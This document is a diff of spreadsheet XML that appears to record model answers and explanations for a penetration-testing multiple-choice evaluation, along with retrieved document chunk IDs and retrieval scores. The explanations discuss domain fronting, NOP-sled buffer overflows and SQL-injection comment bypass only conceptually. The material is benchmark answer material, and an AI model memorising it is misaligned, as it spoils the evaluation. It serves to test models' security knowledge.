 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I32" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J32" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K32" t="inlineStr">
         <is>
@@ -2606,8 +2450,8 @@
       </c>
       <c r="F33" t="inlineStr">
         <is>
-          <t>Answer: Static binary analysis using decompilers
-Explanation: Static binary analysis using decompilers is the most efficient method for initially assessing malware's capabilities without executing its code. This technique involves reviewing the code, binaries, and associated data to extract information and potentially identify and analyze malicious sections. Decompilers convert compiled code back into a higher-level language, providing an understanding of what the malware can do without running it. Dynamic analysis using automated tools and automated dynamic analysis with sandboxes both involve executing the malware, which is not optimal for initial assessment. Static analysis with debuggers may require manual intervention and doesn't convert code to a higher-level understanding as efficiently.</t>
+          <t>Answer: Static Binary Analysis Using Decompilers
+Explanation: Static binary analysis using decompilers is the most efficient method for initially assessing malware's capabilities without executing its code. This approach involves converting the compiled machine code back into a higher-level language, allowing analysts to review the code and gain insights into what the malware can do without running it. Static analysis does not involve actually executing the suspect code, reducing the risk of accidentally triggering any malicious behavior. Dynamic analysis using automated tools (Option 2) and automated dynamic analysis with sandboxes (Option 3) both require executing the malware, which is not optimal for an initial assessment. While static analysis with debuggers (Option 0) can be useful, it often requires manual intervention and may not convert code to a higher-level understanding as efficiently as decompilers do.</t>
         </is>
       </c>
       <c r="G33" t="inlineStr">
@@ -2621,21 +2465,16 @@
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I33" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J33" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K33" t="inlineStr">
         <is>
@@ -2674,7 +2513,7 @@
       <c r="F34" t="inlineStr">
         <is>
           <t>Answer: Domain fronting
-Explanation: Domain fronting is an advanced technique used to circumvent censorship and network-based URL filtering by hiding the true endpoint of internet communications. It works by using a different domain name in the outer HTTP(S) request to the CDN (Content Delivery Network) or cloud service than in the actual request to the command and control server, making the traffic appear as if it is directed to a legitimate, non-malicious service. This is crucial in bypassing filters that block known bad domains or URLs. Cross-site scripting (XSS) is primarily used for injecting malicious code into websites, Command and control (C2) server redundancy is a strategy to ensure availability of the C2 server but does not help in bypassing URL filtering, and side-channel attacks are used to exploit information leaked through indirect channels but are not directly related to disguising outbound traffic.</t>
+Explanation: Domain fronting is an advanced technique used to circumvent censorship and network-based URL filtering by hiding the true endpoint of internet communications. It works by using a different domain name in the outer HTTP(S) request to the CDN (Content Delivery Network) or cloud service than in the actual request to the command and control server, making the traffic appear as if it is directed to a legitimate, non-malicious service. This is crucial in bypassing filters that block known bad domains or URLs. Cross-site scripting (XSS), while a powerful attack technique, is not directly related to disguising outbound traffic for command and control servers. Command and control (C2) server redundancy refers to having multiple C2 servers as a backup plan in case one is taken down, but it does not help bypass URL filtering or blocklisting. Side-channel attacks are methods of obtaining sensitive information indirectly through observing or manipulating external factors, which may not be directly relevant for this specific question.</t>
         </is>
       </c>
       <c r="G34" t="inlineStr">
@@ -2688,21 +2527,16 @@
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I34" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J34" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K34" t="inlineStr">
         <is>
@@ -2741,7 +2575,7 @@
       <c r="F35" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application with unexpected and random data
-Explanation: Fuzzing the application with unexpected and random data is the most effective technique for uncovering buffer overflow vulnerabilities. This technique involves inputting vast amounts of random data to the application in an attempt to crash it and identify potential buffer overflows, which can then be exploited. Static analysis of source code can reveal some security flaws but does not dynamically interact with the running application like fuzzing does, making it less effective for identifying runtime vulnerabilities such as buffer overflows. Inspecting network traffic between clients and the application may reveal some information about the application's behavior but is unlikely to directly uncover buffer overflow vulnerabilities. Implementing stricter access control mechanisms in the application can prevent certain types of attacks, but it does not actively search for or identify buffer overflow vulnerabilities.</t>
+Explanation: Fuzzing the application with unexpected and random data is the most effective technique for uncovering buffer overflow vulnerabilities. This technique involves inputting vast amounts of random data to the application in an attempt to crash it and identify potential buffer overflows, which can then be exploited. Static analysis of the application's source code may reveal some vulnerabilities but might not catch all possible buffer overflow scenarios. Inspecting network traffic between clients and the application is more related to network-level attacks rather than uncovering buffer overflow vulnerabilities in a proprietary software application. Implementing stricter access control mechanisms in the application can help prevent unauthorized access, but it does not directly address discovering buffer overflow vulnerabilities.</t>
         </is>
       </c>
       <c r="G35" t="inlineStr">
@@ -2755,21 +2589,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I35" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J35" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K35" t="inlineStr">
         <is>
@@ -2808,7 +2637,7 @@
       <c r="F36" t="inlineStr">
         <is>
           <t>Answer: Signature-based Detection
-Explanation: Signature-based Detection is least effective in revealing the malware's potential evasion techniques. This method relies on previously known patterns and signatures to detect malware, which makes it ineffective against new or significantly modified malware variants that employ evasion techniques not yet catalogued. Dynamic Behavioral Analysis would be more effective as it observes the malware's behavior during execution, thus detecting novel evasion actions. Static Code Analysis, while less effective than dynamic analysis for unknown evasion techniques, still surpasses signature-based methods because it allows analysis of the code structure and flow without execution, potentially identifying suspicious constructs. Code Obfuscation is a technique used by malware developers to make static and dynamic analysis more difficult, but it does not directly reveal evasion techniques; rather, it makes their detection harder.</t>
+Explanation: Signature-based Detection is least effective in revealing the malware's potential evasion techniques. This method relies on previously known patterns and signatures to detect malware, which makes it ineffective against new or significantly modified malware variants that employ evasion techniques not yet catalogued. Dynamic Behavioral Analysis would be more effective as it observes the malware's behavior during execution, thus detecting novel evasion actions. Static Code Analysis, while less effective than dynamic analysis for unknown evasion techniques, still surpasses signature-based methods because it allows analysis of the code structure and flow without execution, potentially identifying suspicious constructs. Code Obfuscation is a technique used by malware developers to make static and dynamic analysis more difficult, but it can be overcome with advanced analysis techniques.</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -2822,21 +2651,16 @@
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I36" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J36" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K36" t="inlineStr">
         <is>
@@ -2875,7 +2699,7 @@
       <c r="F37" t="inlineStr">
         <is>
           <t>Answer: Malware Analysis Sandbox
-Explanation: A 'Malware Analysis Sandbox' is designed specifically for safely observing and analyzing the behavior of malware in a controlled and isolated environment that simulates various operating systems and network services. This allows security analysts to study the malware without it compromising their primary systems. The use of a sandbox is pivotal for analyzing potential threats as it provides insights into the malware's functionality, network communication, and attempts to exploit system vulnerabilities, which can be critical in developing protections against it. 'System Integrity Verifier (SIV)' is generally meant to ensure that files are not modified or deleted unintentionally, rather than analyzing malware behavior. A 'Host-based Intrusion Detection System (HIDS)' is useful for monitoring and analyzing system internals and logs to detect malicious activity, but it does not provide an environment to safely execute and observe malware. An 'Advanced Persistent Threat (APT) tracker' is a concept rather than a specific tool, associated with monitoring and mitigating sophisticated, long-term cybersecurity threats, but it does not describe a specific functionality for malware behavior analysis.</t>
+Explanation: A 'Malware Analysis Sandbox' is designed specifically for safely observing and analyzing the behavior of malware in a controlled and isolated environment that simulates various operating systems and network services. This allows security analysts to study the malware without it compromising their primary systems. The use of a sandbox is pivotal for analyzing potential threats as it provides insights into the malware's functionality, network communication, and attempts to exploit system vulnerabilities, which can be critical in developing protections against it. 'System Integrity Verifier (SIV)' is generally meant to ensure that software installations maintain their integrity and are not tampered with, rather than directly analyzing malware behavior. A 'Host-based Intrusion Detection System (HIDS)' is useful for monitoring and analyzing system internals and logs to detect malicious activity, but it does not provide an environment to safely execute and observe malware. An 'Advanced Persistent Threat (APT) tracker' is a concept rather than a specific tool, associated with monitoring and mitigating sophisticated, long-term cybersecurity threats, but it does not describe a specific functionality for malware behavior analysis.</t>
         </is>
       </c>
       <c r="G37" t="inlineStr">
@@ -2889,21 +2713,16 @@
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9024d739-2723-477e-be88-d5fbfabd0bc4, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I37" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J37" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K37" t="inlineStr">
         <is>
@@ -2956,21 +2775,16 @@
 preemware_pentestingeval.pdf (Chunk: 3174d3d2-432c-4ee5-9f5d-c8d28c7c6cbe, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I38" t="inlineStr">
         <is>
-          <t>Semantic: 4, Keyword: 6, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J38" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K38" t="inlineStr">
         <is>
@@ -3009,7 +2823,7 @@
       <c r="F39" t="inlineStr">
         <is>
           <t>Answer: Buffer Overflow
-Explanation: A buffer overflow vulnerability occurs when a program writes more data into a memory buffer than it can hold, causing the data to overwrite adjacent memory locations. This can lead to arbitrary code execution by redirecting the execution flow to a location within the NOP sled, which then leads to the execution of shellcode. The other options are incorrect because XSS and CSRF are web vulnerabilities exploited via malicious scripts or forged requests manipulated through a user's browser rather than directly corrupting memory or control flow within an application's process. SQL Injection involves sending malicious SQL queries through input fields to manipulate or retrieve data from a database, without involving memory corruption or control flow alteration.</t>
+Explanation: A Buffer Overflow exploit is most suitably attacked using a NOP sled combined with shellcode. This technique is used to inject arbitrary code into the memory of a running process by overflowing a buffer and overwriting the return pointer of a stack frame, redirecting execution to a location within the NOP sled, which then leads to the execution of shellcode. The other options are incorrect because XSS and CSRF are web vulnerabilities exploited via malicious scripts or forged requests manipulated through a user's browser rather than directly corrupting memory or control flow within an application's process. SQL Injection involves sending malicious SQL queries through input fields to manipulate or retrieve data from a database, without involving memory corruption or control flow alteration.</t>
         </is>
       </c>
       <c r="G39" t="inlineStr">
@@ -3023,21 +2837,16 @@
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I39" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J39" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K39" t="inlineStr">
         <is>
@@ -3077,7 +2886,7 @@
       <c r="F40" t="inlineStr">
         <is>
           <t>Answer: Dynamic analysis
-Explanation: Dynamic analysis is the correct technique for this scenario because it involves running the malware in a controlled environment (often a sandbox) to observe its behavior such as system calls, registry changes, network communication, and other dynamic attributes. This method is necessary to understand how malware interacts with a system in real-time. Static analysis, on the other hand, examines the malware without executing it, using tools to assess its code, structure, and potential capabilities. Automated scanning refers to the use of automated tools to identify known signatures or vulnerabilities, and fuzz testing is a software testing technique that involves inputting large amounts of random data ('noise') into a system in order to trigger an error or uncover vulnerabilities.</t>
+Explanation: Dynamic analysis is the technique that involves executing the malware in a controlled environment, such as a sandbox, to observe its behavior. This method allows analysts to monitor system calls, network communication, and changes to files and registry in real-time, providing valuable insights into how the malware interacts with a system. Static analysis, on the other hand, examines the code without executing it, while automated scanning uses tools to identify known signatures or vulnerabilities. Fuzz testing involves inputting large amounts of random data ('noise') into a system to trigger errors or uncover vulnerabilities but does not specifically focus on observing malware behavior in a controlled environment.</t>
         </is>
       </c>
       <c r="G40" t="inlineStr">
@@ -3091,21 +2900,16 @@
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I40" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J40" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K40" t="inlineStr">
         <is>
@@ -3144,7 +2948,7 @@
       <c r="F41" t="inlineStr">
         <is>
           <t>Answer: SQL injection to bypass authentication by comment-symbol concatenation
-Explanation: The correct answer is 'SQL injection to bypass authentication by comment-symbol concatenation'. This technique allows an attacker to insert or manipulate SQL queries in the input fields where the entry is not properly sanitized by the server. Comment symbols (like --, #, or /* */) can be used to comment out parts of the SQL code, effectively altering its behavior, often used to bypass login mechanisms or access unauthorized information without triggering system-monitoring tools that are more focused on</t>
+Explanation: The correct answer is 'SQL injection to bypass authentication by comment-symbol concatenation'. This technique allows an attacker to insert or manipulate SQL queries in the input fields where the entry is not properly sanitized by the server. Comment symbols (like --, #, or /* */) can be used to comment out parts of the SQL code, effectively altering its behavior, often used to bypass login mechanisms or access unauthorized information without triggering system-monitoring tools that are more focused on command execution on the server side.</t>
         </is>
       </c>
       <c r="G41" t="inlineStr">
@@ -3158,21 +2962,16 @@
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: eb48e914-8ae1-4052-9151-aaaf23f52452, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 664f7dd6-24a1-4cd8-9bb1-de9e98a49ce6, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I41" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J41" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K41" t="inlineStr">
         <is>
@@ -3225,21 +3024,16 @@
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I42" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J42" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K42" t="inlineStr">
         <is>
@@ -3277,8 +3071,8 @@
       </c>
       <c r="F43" t="inlineStr">
         <is>
-          <t>Answer: Using API hooking to monitor and modify the behavior of standard library calls
-Explanation: Using API hooking to monitor and modify the behavior of standard library calls is the most effective technique for dynamically analyzing malware behavior. This method allows the analyst to observe how malware operates in a controlled environment by monitoring and modifying its interactions with standard library calls, which can reveal important information about its behavior, intentions, and potential exploits.</t>
+          <t>Answer: Using API hooking to monitor and modify the behavior of standard library calls.
+Explanation: This technique allows analysts to observe how malware operates in a controlled environment by monitoring and modifying its interactions with standard library calls. It provides insight into the malware's behavior without risking the integrity of the host system. While other options may have some merit, they are either more complex or less effective for dynamic analysis purposes.</t>
         </is>
       </c>
       <c r="G43" t="inlineStr">
@@ -3292,21 +3086,16 @@
 preemware_pentestingeval.pdf (Chunk: f971e074-81e8-4330-b662-e293762c3f9c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I43" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J43" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K43" t="inlineStr">
